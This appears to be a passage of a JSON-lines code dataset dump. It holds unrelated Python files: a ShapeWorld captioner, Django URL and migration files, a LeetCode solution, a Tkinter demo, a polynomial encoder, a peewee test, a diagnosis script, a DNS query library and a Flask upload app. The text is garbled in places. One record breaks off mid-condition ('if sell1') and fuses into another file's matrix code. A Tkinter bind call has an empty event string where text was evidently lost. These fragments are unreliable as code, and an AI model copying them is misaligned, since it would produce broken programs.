self.body_captioner.sample_values(mode=mode, correct=(self.incorrect_mode != 2), predication=predication): # 2: incorrect body\n return False\n\n if self.incorrect_mode == 3: # 3: incorrect quantifier\n self.incorrect_quantifiers = [(qtype, qrange, quantity) for qtype, qrange, quantity in self.quantifiers if qtype != self.qtype or qrange != self.qrange or quantity != self.quantity]\n\n return True\n\n def model(self):\n return util.merge_dicts(\n dict1=super(QuantifierCaptioner, self).model(),\n dict2=dict(\n qtype=self.qtype,\n qrange=self.qrange,\n quantity=self.quantity,\n incorrect_mode=self.incorrect_mode,\n restrictor_captioner=self.restrictor_captioner.model(),\n body_captioner=self.body_captioner.model()\n )\n )\n\n def caption(self, predication, world):\n assert predication.empty()\n\n rstr_predication = predication.sub_predication()\n rstr_body_predication = predication.sub_predication()\n body_predication = predication.sub_predication()\n\n if (self.qtype, self.qrange, self.quantity) in QuantifierCaptioner.zero_quantifiers:\n # special case: zero quantifier, hence incorrect body\n rstr_body_predication_copy = rstr_body_predication.copy()\n body = self.body_captioner.caption(predication=rstr_body_predication_copy, world=world)\n if body is None:\n return None\n if not self.body_captioner.incorrect(caption=body, predication=rstr_body_predication, world=world):\n return None\n\n restrictor = self.restrictor_captioner.caption(predication=rstr_body_predication_copy, world=world)\n if restrictor is None:\n return None\n self.restrictor_captioner.apply_caption_to_predication(caption=restrictor, predication=rstr_body_predication)\n\n else:\n body = self.body_captioner.caption(predication=rstr_body_predication, world=world)\n if body is None:\n return None\n\n restrictor = self.restrictor_captioner.caption(predication=rstr_body_predication, world=world)\n if restrictor is None:\n return None\n\n self.restrictor_captioner.apply_caption_to_predication(caption=restrictor, predication=rstr_predication)\n self.body_captioner.apply_caption_to_predication(caption=body, predication=body_predication)\n\n if not self.pragmatical_tautology and rstr_predication.equals(other=body_predication):\n return None\n\n return Quantifier(qtype=self.qtype, qrange=self.qrange, quantity=self.quantity, restrictor=restrictor, body=body)\n\n def incorrect(self, caption, predication, world):\n assert predication.empty()\n\n if self.incorrect_mode == 0: # 0: correct\n rstr_predication, body_predication = self.apply_caption_to_predication(caption=caption, predication=predication)\n\n elif self.incorrect_mode == 1: # 1: incorrect restrictor\n rstr_predication = predication.sub_predication()\n if not self.restrictor_captioner.incorrect(caption=caption.restrictor, predication=rstr_predication, world=world):\n return False\n rstr_body_predication = predication.sub_predication(predication=rstr_predication.copy())\n self.body_captioner.apply_caption_to_predication(caption=caption.body, predication=rstr_body_predication)\n body_predication = predication.sub_predication()\n self.body_captioner.apply_caption_to_predication(caption=caption.body, predication=body_predication)\n\n elif self.incorrect_mode == 2: # 2: incorrect body\n rstr_predication = predication.sub_predication()\n self.restrictor_captioner.apply_caption_to_predication(caption=caption.restrictor, predication=rstr_predication)\n rstr_body_predication = predication.sub_predication(predication=rstr_predication.copy())\n if (self.qtype, self.qrange, self.quantity) in QuantifierCaptioner.zero_quantifiers:\n # special case: zero quantifier, hence correct body\n caption.body = self.body_captioner.caption(predication=rstr_body_predication, world=world)\n if caption.body is None:\n return False\n else:\n if not self.body_captioner.incorrect(caption=caption.body, predication=rstr_body_predication, world=world):\n return False\n body_predication = predication.sub_predication()\n self.body_captioner.apply_caption_to_predication(caption=caption.body, predication=body_predication)\n\n elif self.incorrect_mode == 3: # 3: incorrect quantifier\n rstr_predication, body_predication = self.apply_caption_to_predication(caption=caption, predication=predication)\n caption.qtype, caption.qrange, caption.quantity = choice(self.quantifiers)\n\n if not self.pragmatical_tautology and rstr_predication.equals(other=body_predication):\n return False\n\n return True\n\n def apply_caption_to_predication(self, caption, predication):\n rstr_predication = predication.sub_predication()\n self.restrictor_captioner.apply_caption_to_predication(caption=caption.restrictor, predication=rstr_predication)\n rstr_body_predication = predication.sub_predication(predication=rstr_predication.copy())\n self.body_captioner.apply_caption_to_predication(caption=caption.body, predication=rstr_body_predication)\n body_predication = predication.sub_predication()\n self.body_captioner.apply_caption_to_predication(caption=caption.body, predication=body_predication)\n return rstr_predication, body_predication\n","sub_path":"shapeworld/captioners/quantifier.py","file_name":"quantifier.py","file_ext":"py","file_size_in_byte":9278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"94110296","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom .views import homeView,loginView,signupView,profil,logoutView\n\n\nurlpatterns = [\n url(r'^profil/$', profil, name='profil'),\n url(r'^logout/$', logoutView, name='logout'),\n url(r'^signup/$', signupView, name='signup'),\n url(r'^login/$', loginView, name='login'),\n url(r'^$', homeView, name='home'),\n url(r'^admin/', admin.site.urls),\n]\n","sub_path":"latihanLogin/mywebsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114919814","text":"class Solution:\n def maxProfit(self, prices: 'List[int]') -> 'int':\n buy1,buy2,sell1,sell2=-sys.maxsize,-sys.maxsize,0,0\n for i in prices:\n if buy1<-i:\n buy1=-i\n \n if sell1 4 :\n for i in range(len(copia)) :\n m[i].pop(len(m[i])-1)\n m[i].pop(0)\n retirado += 2\n if len(m) == 4 :\n retirado += len(m[0])\n m.pop(0)\n elif len(m) > 4 :\n retirado += (len(m[0]) * 2)\n m.pop(len(m)-1)\n m.pop(0)\n return retirado\n","sub_path":"atividades/mini_testes/reduz_matriz/questao.py","file_name":"questao.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391690322","text":"# -*- encoding: utf-8 -*-\n\n# Področje, na katerega lahko rišemo krogce.\n# S pritiskom na levi gumb narišemo krogec.\n\nfrom tkinter import *\n\nclass Krogci():\n def __init__(self, master):\n # Naredimo področje za risanje\n self.canvas = Canvas(master, width=300, height=300)\n self.canvas.pack()\n\n # Registiramo se za klike z levim gumbom na canvasu\n self.canvas.bind(\"\", self.narisi_krogec)\n\n def narisi_krogec(self, event):\n '''Nariši krogec, kjer trenutno stoji miška.'''\n self.canvas.create_oval(event.x-5, event.y-5, event.x+5, event.y+5)\n\n\n# Glavnemu oknu rečemo \"root\" (koren), ker so grafični elementi\n# organizirani v drevo, glavno okno pa je koren tega drevesa\n\n# Naredimo glavno okno\nroot = Tk()\n\naplikacija = Krogci(root)\n\n# Kontrolo prepustimo glavnemu oknu. Funkcija mainloop neha\n# delovati, ko okno zapremo.\nroot.mainloop()\n","sub_path":"01_Tkinter/demo5.py","file_name":"demo5.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"635141817","text":"from random import randint\nfrom mtmHelper import MtmHelper\n\nclass Codificador:\n '''Codifica e decodifica valores decimais baseados numa f(x) pré definida e suas variaçõess'''\n\n def __init__(self, nCoefsPolinomio, coefs = None):\n self.mtmHelper = MtmHelper()\n if not(coefs):\n self.coefs = [randint(0, 99) for i in range(nCoefsPolinomio)]\n else:\n self.coefs = coefs\n self.exp = list(range(nCoefsPolinomio))\n self.k = 1\n self.ultOp = \"deriv\"\n \n def f(self, x):\n '''f(x) = a*x**n + b*x**(n-1) + ... + c*x**0'''\n y = 0\n for i in range(len(self.coefs)):\n y += (x ** self.exp[i])*self.coefs[i]\n return y\n\n def modificaPolinomio(self):\n def temZero(lista):\n return 0 in lista\n\n if (self.ultOp == \"deriv\" and sum(self.coefs) > (self.coefs[0] + self.coefs[1])) or not temZero(self.coefs):\n self.coefs = self.mtmHelper.derivaPol(self.coefs, self.exp)\n self.ultOp = \"deriv\"\n else:\n self.coefs = self.mtmHelper.integraPol(self.coefs, self.exp, self.k)\n self.k += 1\n self.ultOp = \"integr\"\n\n def tranfQuebradoEmTupla(self, inteiro, decimal):\n n = decimal\n while n - int(n) > 0:\n n *= 10\n return (int(inteiro), int(n))\n\n def codifica(self, valorUnicode):\n res = self.f(valorUnicode)\n self.modificaPolinomio()\n\n valorDecimail = res - int(res)\n if valorDecimail > 0:\n res = self.tranfQuebradoEmTupla(res, valorDecimail)\n \n return res\n\n def decodifica(self, valor):\n y = 0\n if type(valor) == tuple:\n parteDecimal = valor[1]\n while parteDecimal > 1:\n parteDecimal /= 10\n y = (valor[0] + parteDecimal)\n else:\n y = valor\n \n res = self.mtmHelper.raiz(lambda x: self.f(x) - y, 0, 300)\n\n intTeto = int(res) + 1\n intBase = int(res)\n if res - intBase < intTeto - res:\n res = intBase\n else:\n res = intTeto\n\n self.modificaPolinomio()\n return res\n","sub_path":"codificador.py","file_name":"codificador.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"616455068","text":"\nfrom django.urls import path\n\n\nfrom account.views import *\n\nurlpatterns = [\n path('register/', RegisterUser.as_view(), name='register'),\n path('login/', LoginUser.as_view(), name='login'),\n path('logout/', logout_user, name='logout'),\n path('profile/', Profile.as_view(), name='profile'),\n\n]\n\n","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"224805270","text":"'''Integrated testing of the basic_operations module'''\r\n\r\n# pylint disabled: C0413, E0401\r\n\r\nfrom unittest import TestCase\r\nimport sys\r\nimport peewee\r\n\r\nsys.path.insert(1, '../')\r\nfrom customer_model import DATABASE, Customer\r\nimport basic_operations\r\n\r\nDATABASE.drop_tables([Customer])\r\nDATABASE.create_tables([Customer])\r\n\r\nclass TestBasicOperations(TestCase):\r\n '''Testing basic_operations functioanlity'''\r\n def test_integration(self):\r\n '''Integrated test set'''\r\n cust_list = [(101, 'Bugs', 'Bunny', '123 NE 160th Ave, Kirkland, WA 98034', '425-123-4567',\r\n 'bugs_bunny@gmail.com', 'Active', 100.00),\r\n (123, 'Donald', 'Duck', '456 SE 45th St, Bellevue, WA 98004', '425-234-5678',\r\n 'donald_duck@gmail.com', 'Active', 500.00),\r\n (53, 'Elmer', 'Fudd', '789 W 52nd Pl, Bothell, WA 98077', '425-345-6789',\r\n 'elmer_fudd@gmail.com', 'Inactive', 12000.00)]\r\n\r\n test_dict = {'f_name': 'Bugs', 'l_name': 'Bunny', 'email': 'bugs_bunny@gmail.com',\r\n 'phone': '425-123-4567'}\r\n\r\n # Test adding customers\r\n basic_operations.add_customer(*cust_list[0])\r\n basic_operations.add_customer(*cust_list[1])\r\n basic_operations.add_customer(*cust_list[2])\r\n\r\n cust_0 = Customer.get(Customer.cust_id == 101)\r\n cust_1 = Customer.get(Customer.cust_id == 123)\r\n cust_2 = Customer.get(Customer.cust_id == 53)\r\n\r\n # Verify customers were added\r\n try:\r\n self.assertEqual(cust_0.f_name, cust_list[0][1])\r\n self.assertEqual(cust_1.f_name, cust_list[1][1])\r\n self.assertEqual(cust_2.f_name, cust_list[2][1])\r\n except peewee.IntegrityError:\r\n assert False\r\n\r\n # Verify duplicate customers are not added\r\n try:\r\n with self.assertRaises(ValueError):\r\n basic_operations.add_customer(*cust_list[2])\r\n except peewee.IntegrityError:\r\n assert False\r\n\r\n # Verify able to search and find a customer\r\n self.assertEqual(basic_operations.search_customer(101), test_dict)\r\n\r\n # Verify searching for a non-existant customer is empty\r\n self.assertEqual(basic_operations.search_customer(3), {})\r\n\r\n # Verify able to update customer credit limit\r\n try:\r\n basic_operations.update_customer_credit(123, 100000)\r\n cust_1 = Customer.get(Customer.cust_id == 123)\r\n self.assertEqual(cust_1.credit, 100000)\r\n except peewee.IntegrityError:\r\n assert False\r\n\r\n # Verify customer credit limit cannot be updated for non-customer\r\n with self.assertRaises(ValueError):\r\n basic_operations.update_customer_credit(42, 1000)\r\n\r\n # Verify active customers are counted\r\n self.assertEqual(basic_operations.list_active_customers(), 2)\r\n\r\n # Verify a customer can be deleted\r\n try:\r\n basic_operations.delete_customer(53)\r\n self.assertEqual(cust_0.f_name, cust_list[0][1])\r\n self.assertEqual(cust_1.f_name, cust_list[1][1])\r\n try:\r\n Customer.get(Customer.cust_id == 53)\r\n assert False\r\n except peewee.DoesNotExist:\r\n assert True\r\n except peewee.IntegrityError:\r\n assert False\r\n\r\n # Verify a non-customer cannot be deleted\r\n with self.assertRaises(ValueError):\r\n basic_operations.delete_customer(55)\r\n","sub_path":"students/allen_maxwell/Lesson_03/tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"627148906","text":"import pandas as pd\r\nimport numpy as np\r\nimport pickle\r\nfrom translate import Translator\r\nimport joblib\r\nimport jieba\r\n\r\n\r\ndef is_ch(ch):\r\n if '\\u4e00' <= ch <= '\\u9fff':\r\n return True\r\n return False\r\n\r\n\r\ndef remove_pun(txt):\r\n new_txt = ''\r\n for char in txt:\r\n if is_ch(char):\r\n new_txt += char\r\n return new_txt\r\n\r\n\r\ndef str2vec(str1, str2):\r\n str1_set = set(str1)\r\n str2_set = set(str2)\r\n union = str1_set | str2_set\r\n vec1 = []\r\n vec2 = []\r\n for char in union:\r\n if char in str1_set:\r\n vec1.append(1)\r\n else:\r\n vec1.append(0)\r\n if char in str2_set:\r\n vec2.append(1)\r\n else:\r\n vec2.append(0)\r\n return np.array(vec1), np.array(vec2)\r\n\r\n\r\ndef cosine_similarity(x, y):\r\n num = x.dot(y.T)\r\n denom = np.linalg.norm(x) * np.linalg.norm(y)\r\n return num / denom\r\n\r\n\r\ndef get_feature_names(path):\r\n with open(path, 'rb') as f:\r\n feature_names = pickle.load(f)\r\n return feature_names\r\n\r\n\r\ndef get_target_names(path):\r\n with open(path, 'rb') as f:\r\n target_names = pickle.load(f)\r\n return target_names\r\n\r\n\r\ndef get_x(symptom, feature_names):\r\n x = [0] * len(feature_names)\r\n for s in symptom:\r\n sim = np.array(list(map(lambda x: cosine_similarity(*str2vec(s, x)), feature_names)))\r\n if sim.max() > 0:\r\n x[sim.argmax()] = 1\r\n return np.array(x)\r\n\r\n\r\ndef get_model(path):\r\n return joblib.load(path)\r\n\r\n\r\nfeature_names = get_feature_names('feature_names.pkl')\r\ntarget_names = get_target_names('target_names.pkl')\r\nclf = get_model('rf.pkl')\r\n\r\n\r\ndef get_disease(symptom):\r\n symptom = remove_pun(symptom)\r\n symptom = jieba.cut(symptom, cut_all=False)\r\n symptom = [s for s in symptom]\r\n x = get_x(symptom, feature_names).reshape(1, -1)\r\n translator = Translator(to_lang=\"chinese\")\r\n disease = translator.translate(target_names[clf.predict(x)[0]])\r\n return disease\r\n","sub_path":"2 老年人的远程智能诊疗/基于随机森林的医疗初诊系统 - 吃个面包压压惊/diagnosis.py","file_name":"diagnosis.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653090506","text":"from base64 import b64encode\nimport dns.rdatatype\nimport dns.message\nimport dns.resolver\nimport logging\nimport select\nimport socket\nimport threading\nimport time\n\n\ndef get_ips(host, nameserver=None, record=\"A\"):\n nameservers = []\n if nameserver is not None:\n nameservers = [nameserver]\n return lookup_domain(host, nameservers=nameservers, rtype=record)\n\n\ndef lookup_domain(domain, nameservers=[], rtype=\"A\", timeout=2):\n \"\"\"Wrapper for DNSQuery method\"\"\"\n dns_exp = DNSQuery(domains=[domain], nameservers=nameservers, rtype=rtype,\n timeout=timeout)\n return dns_exp.lookup_domain(domain)\n\n\ndef lookup_domains(domains, nameservers=[], rtype=\"A\", timeout=10):\n dns_exp = DNSQuery(domains=domains, nameservers=nameservers, rtype=rtype,\n timeout=timeout)\n return dns_exp.lookup_domains()\n\n\ndef send_chaos_queries():\n dns_exp = DNSQuery()\n return dns_exp.send_chaos_queries()\n\n\nclass DNSQuery():\n \"\"\"Class to store state for all of the DNS queries\"\"\"\n\n def __init__(self, domains=[], nameservers=[], rtype=\"A\", timeout=10,\n max_threads=100):\n \"\"\"Constructor for the DNS query class\n\n Params:\n nameserver- the nameserver to use, defaults to the local resolver\n rtype- the record type to lookup (as text), by default A\n timeout- how long to wait for a response, by default 10 seconds\n\n \"\"\"\n self.domains = domains\n self.rtype = rtype\n self.timeout = timeout\n self.max_threads = max_threads\n if nameservers == []:\n nameservers = dns.resolver.Resolver().nameservers\n self.nameservers = nameservers\n self.results = {}\n self.threads = []\n\n def send_chaos_queries(self):\n \"\"\"Send chaos queries to identify the DNS server and its manufacturer\n\n Note: we send 2 queries for BIND stuff per RFC 4892 and 1\n query per RFC 6304\n\n Note: we are not waiting on a second response because we\n shouldn't be getting injected packets here\n\n \"\"\"\n names = [\"HOSTNAME.BIND\", \"VERSION.BIND\", \"ID.SERVER\"]\n self.results = {'exp-name': \"chaos-queries\"}\n for name in names:\n self.results[name] = {}\n for nameserver in self.nameservers:\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.settimeout(self.timeout)\n query = dns.message.make_query(name,\n dns.rdatatype.from_text(\"TXT\"),\n dns.rdataclass.from_text(\"CH\"))\n sock.sendto(query.to_wire(), (nameserver, 53))\n reads, _, _ = select.select([sock], [], [], self.timeout)\n if reads == []:\n self.results[name][nameserver] = None\n else:\n response = reads[0].recvfrom(4096)[0]\n self.results[name][nameserver] = b64encode(response)\n return self.results\n\n def lookup_domains(self):\n \"\"\"More complex DNS primitive that lookups domains concurrently\n\n Note: if you want to lookup multiple domains, you should use\n this function\n \"\"\"\n thread_error = False\n thread_wait_timeout = 200\n ind = 1\n total_item_count = len(self.domains)\n for domain in self.domains:\n for nameserver in self.nameservers:\n wait_time = 0\n while threading.active_count() > self.max_threads:\n time.sleep(1)\n wait_time += 1\n if wait_time > thread_wait_timeout:\n thread_error = True\n break\n\n if thread_error:\n self.results[\"error\"] = \"Threads took too long to finish.\"\n break\n log_prefix = \"%d/%d: \" % (ind, total_item_count)\n thread = threading.Thread(target=self.lookup_domain,\n args=(domain, nameserver,\n log_prefix))\n thread.setDaemon(1)\n thread.start()\n self.threads.append(thread)\n if thread_error:\n break\n ind += 1\n\n for thread in self.threads:\n thread.join(self.timeout * 3)\n return self.results\n\n def lookup_domain(self, domain, nameserver=None, log_prefix = ''):\n \"\"\"Most basic DNS primitive that lookups a domain, waits for a\n second response, then returns all of the results\n\n Params:\n domain- the domain to lookup\n nameserver- the nameserver to use\n\n Note: if you want to lookup multiple domains you *should not* use\n this function, you should use lookup_domains because this does\n blocking IO to wait for the second response\n\n \"\"\"\n # get the resolver to use\n if nameserver is None:\n nameserver = self.nameservers[0]\n results = {'domain': domain, 'nameserver': nameserver}\n # construct the socket to use\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.settimeout(self.timeout)\n\n logging.debug(\"%sQuerying DNS enteries for \"\n \"%s (nameserver: %s).\" % (log_prefix, domain, nameserver))\n\n # construct and send the request\n request = dns.message.make_query(domain,\n dns.rdatatype.from_text(self.rtype))\n results['request'] = b64encode(request.to_wire())\n sock.sendto(request.to_wire(), (nameserver, 53))\n\n # read the first response from the socket\n reads, _, _ = select.select([sock], [], [], self.timeout)\n # if we didn't get anything, then set the results to nothing\n if reads == []:\n results['response1'] = None\n self.results[domain] = results\n return results\n response = reads[0].recvfrom(4096)[0]\n results['response1'] = b64encode(response)\n resp = dns.message.from_wire(response)\n results['response1-ips'] = self.parse_out_ips(resp)\n\n # if we have made it this far, then wait for the next response\n reads, _, _ = select.select([sock], [], [], self.timeout)\n # if we didn't get anything, then set the results to nothing\n if reads == []:\n results['response2'] = None\n self.results[domain] = results\n return results\n response = reads[0].recvfrom(4096)[0]\n results['response2'] = b64encode(response)\n resp = dns.message.from_wire(response)\n results['response2-ips'] = self.parse_out_ips(resp)\n self.results[domain] = results\n return results\n\n def parse_out_ips(self, message):\n \"\"\"Given a message, parse out the ips in the answer\"\"\"\n\n ips = []\n for entry in message.answer:\n for rdata in entry.items:\n ips.append(rdata.to_text())\n return ips\n","sub_path":"centinel/primitives/dnslib.py","file_name":"dnslib.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"6675562","text":"from flask import Flask, render_template, request\nimport re\nimport json\nimport csv\nimport sqlite3\nfrom werkzeug.utils import secure_filename\nfrom ravisample import endview\napp = Flask(__name__)\n\n\n\n@app.route('/')\ndef upload_file():\n return render_template('upload.html')\n\n\n\n@app.route('/uploader', methods=['GET', 'POST'])\ndef upload_fil():\n if request.method == 'POST':\n u = request.form['name']\n f = request.files['file']\n f.save(secure_filename(f.filename))\n s = f.filename\n st = str(s)\n cl=endview()\n if st.endswith(\".csv\"):\n return cl.csvf(f,u)\n\n elif st.endswith(\".json\"):\n return cl.jsonf(f,u)\n\n elif st.endswith(\".txt\"):\n return cl.txtf(f,u)\n else:\n return \"NO\"\n\n\n\n@app.route('/count',methods=['GET', 'POST'])\ndef count():#NUMBER OF PASSWORDS IN A USER TABLE\n if request.method == 'POST':\n u = request.form['name']\n k=endview()\n r=k.Npassword(u)\n return \"Number of Duplicate users is {}\".format(str(r))\n\n\n\n@app.route('/noft',methods=['GET', 'POST'])\ndef noft():#NUMBER OF TABLES IN DATABASE\n vl=endview()\n k=vl.NTables()\n return \"NUMBER OF TABLES IN DATABASE IS {}\".format(str(k))\n\n\n\n@app.route('/dp',methods=['GET','POST'])\ndef dp():#DUPLICATE USERS ACROSS ALL TABLES IN A DATABASE\n u=request.form['name']\n rr=endview()\n k=rr.DuplicateUsers(u)\n return \"Number of Duplicate Users Accross all Tables in DATABASE is {}\".format(str(k))\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"fileupload.py","file_name":"fileupload.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"634134545","text":"# Module: RTG.py\r\n# class rtg -> RTG and methods for executing commands assigned to RTG\r\n#\r\n# Laixian Wan\r\n# wanlx@bu.edu\r\n\r\nfrom enum import Enum\r\nfrom RTGCommand import cmdStatus\r\n\r\nclass rtgStatus(Enum):\r\n STOP = -1\r\n IDLE = 0\r\n WORKING = 1\r\n\r\nclass rtg:\r\n def __init__(self, position, ID):\r\n self.ID = ID\r\n self.cmd = None\r\n self.endPos = self.pos = position\r\n self.stat = rtgStatus.IDLE\r\n self.notAvailableUntil = -1\r\n self.cmdPool = [] \r\n self.ttlDistance = 0\r\n self.ttlServiceTime = 0\r\n\r\n def addToPool(self, CMD, left, right, blockObj):\r\n '''\r\n adds assigned commends to rtg's own command pool.\r\n returns a bool value to indicate if rtg accepts assigned works.\r\n '''\r\n if self.stat != rtgStatus.IDLE or CMD == []:\r\n return False \r\n else: \r\n #self.cmdPool = sorted(CMD, key = lambda x: x.bay.bayNum.value, reverse = True)\r\n self.cmdPool = [cmd for cmd in CMD if cmd.bay.bayNum.value > left and cmd.bay.bayNum.value < right]\r\n if abs(self.pos.bayNum.value - CMD[0].bay.bayNum.value) < abs(self.pos.bayNum.value - CMD[-1].bay.bayNum.value):\r\n self.cmdPool.reverse()\r\n for cmd in self.cmdPool:\r\n blockObj.pendingCMD.remove(cmd)\r\n self.endPos = CMD[0].bay\r\n self.stat = rtgStatus.WORKING\r\n return True\r\n\r\n def runRTG(self, blockObj, T):\r\n '''\r\n checks status of rtg and decide if it can move on to the next command\r\n in its commands pool.\r\n '''\r\n if self.stat != rtgStatus.WORKING:\r\n return\r\n if T >= self.notAvailableUntil:\r\n if self.cmd is not None:\r\n self.cmd.status = cmdStatus.FINISHED\r\n self.cmd.finishTime = T\r\n self.cmd.clean(blockObj, T)\r\n blockObj.finishedCMD.append(self.cmd)\r\n self.cmd = None\r\n # try to avoid this implementation in real time simulation.\r\n # this is a very costly way to check if a previous assigned\r\n # command is done. Try to adopt event-based programming and let\r\n # rtg object raises an event whenever a command is done.\r\n self.executeNxtCmd(T)\r\n \r\n def executeNxtCmd(self, T):\r\n '''\r\n executes a command from rtg's command pool.\r\n '''\r\n if not self.cmdPool:\r\n self.stat = rtgStatus.IDLE\r\n else:\r\n nxtCmd = self.cmdPool.pop()\r\n # updating rtg's properties\r\n self.cmd = nxtCmd\r\n d, t = self.travelTime(self.cmd.bay)\r\n self.notAvailableUntil = T + t + self.cmd.workload\r\n self.ttlServiceTime += t + self.cmd.workload\r\n self.ttlDistance += d\r\n self.pos = self.cmd.bay # important. Might reuse the fact that rtg has access to all\r\n # commands on a certain bay to decide if it can actually wait\r\n # and execute extra commands that are not in its cmdPool\r\n\r\n # updating cmd's properties\r\n self.cmd.updateWaitingTime\r\n self.cmd.startTime = T\r\n self.cmd.status = cmdStatus.PROCESSING\r\n self.cmd.assignToRtg = self.ID\r\n return\r\n\r\n def releaseCmd(self, blockObj):\r\n '''\r\n releases commands from RTG's own command pool.\r\n '''\r\n if self.stat != rtgStatus.WORKING:\r\n return\r\n else:\r\n for cmd in self.cmdPool:\r\n blockObj.pendingCMD.add(cmd)\r\n self.cmdPool = []\r\n\r\n def travelTime(self, bay):\r\n '''\r\n calculates how long the rtg would travel and\r\n how much time would cost for rtg to move from its current\r\n position to a certain bay position, in minute.\r\n '''\r\n distance = abs(self.pos.bayNum.value - bay.bayNum.value)\r\n return (distance, distance * 2)\r\n \r\n def __str__(self):\r\n return \"RTG ID: \" + str(self.ID) + \"\\nProcessing: \" + str(self.cmd)\r\n","sub_path":"RTG.py","file_name":"RTG.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590266461","text":"#\n# @lc app=leetcode id=9 lang=python3\n#\n# [9] Palindrome Number\n#\n\n# @lc code=start\n\n#This is just a part of qn5\nclass Solution:\n def isPalindrome(self, x: int) -> bool:\n s = str(x)\n l = len(s)\n for i in range(int(l/2)):\n if s[i] != s[l-i-1]:\n return False\n return True\n# @lc code=end\n\n","sub_path":"python3/9.palindrome-number.py","file_name":"9.palindrome-number.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"396089359","text":"import csv\nimport urllib.request\nimport requests\n\nfrom flask import redirect, render_template, request, session, url_for\nfrom functools import wraps\n\nSUPPORTED_TYPES = [\"book\", \"movie\", \"series\", \"song\"]\nALLOWED_FILE_EXTENSIONS = set(['xls', 'xlsx', 'xlsm', 'xltx', 'xltm'])\n\n# https://stackoverflow.com/questions/2336522/png-vs-gif-vs-jpeg-vs-svg-when-best-to-use\nALLOWED_POSTER_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'svg'])\nSUPPORTED_LANGUAGES = [\n 'afrikanns', 'albanian', 'arabic', 'armenian', 'basque', 'bengali',\n 'bulgarian', 'catalan', 'cambodian', 'chinese', 'croation', 'czech',\n 'danish', 'dutch', 'english', 'estonian', 'fiji', 'finnish', 'french',\n 'georgian', 'german', 'greek', 'gujarati', 'hebrew', 'hindi',\n 'hungarian', 'icelandic', 'indonesian', 'irish', 'italian', 'japanese',\n 'javanese', 'korean', 'latin', 'latvian', 'lithuanian', 'macedonian',\n 'malay', 'malayalam', 'maltese', 'maori', 'marathi', 'mongolian', 'nepali',\n 'norwegian', 'persian', 'polish', 'portuguese', 'punjabi', 'quechua',\n 'romanian', 'russian', 'samoan', 'serbian', 'slovak', 'slovenian',\n 'spanish', 'swahili', 'swedish', 'tamil', 'tatar', 'telugu', 'thai',\n 'tibetan', 'tonga', 'turkish', 'ukranian', 'urdu', 'uzbek', 'vietnamese',\n 'welsh', 'xhosa'\n ]\n\n# ensure selected file allowed\n# extension must present and allowed\ndef forbidden_file(filename):\n return '.' not in filename or \\\n filename.rsplit('.', 1)[1].lower() not in ALLOWED_FILE_EXTENSIONS\n\n# ensure poster url exists and it points to an image of an allowed format\n# https://stackoverflow.com/questions/16778435/python-check-if-website-exists\n# https://stackoverflow.com/questions/16511337/correct-way-to-try-except-using-python-requests-module/16511493\ndef forbidden_poster(poster_url):\n\n try:\n request = requests.get(poster_url)\n except requests.exceptions.MissingSchema:\n return True\n\n if request.status_code not in range(200,400):\n return True\n\n if '.' not in poster_url or \\\n poster_url.rsplit('.', 1)[1].lower() not in ALLOWED_POSTER_EXTENSIONS:\n return True\n\n return False\n\ndef apology(error_message=\"\", error_cause=\"\"):\n \"\"\"Renders message as an apology to user.\"\"\"\n\n return render_template(\"apology.html\", error_message=error_message, error_cause=error_cause)\n\ndef success(success_message=\"\"):\n \"\"\"Renders message as a confirmation of a successful action.\"\"\"\n\n return render_template(\"success.html\", success_message=success_message)\n\ndef login_required(f):\n \"\"\"\n Decorate routes to require login.\n\n http://flask.pocoo.org/docs/0.11/patterns/viewdecorators/\n \"\"\"\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if \"user_id\" not in session:\n return redirect(url_for(\"log_in\", next=request.url))\n return f(*args, **kwargs)\n return decorated_function\n\n# convert list of objects into list of dictionaries\ndef dict_conversion(objs):\n dicts = []\n for obj in objs:\n dicts.append(obj.asdict())\n return dicts","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"418838985","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('members', '0013_overseasstudent_visitor'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='overseasstudent',\n name='title',\n field=models.CharField(default='\\u76f4\\u535a\\u751f', 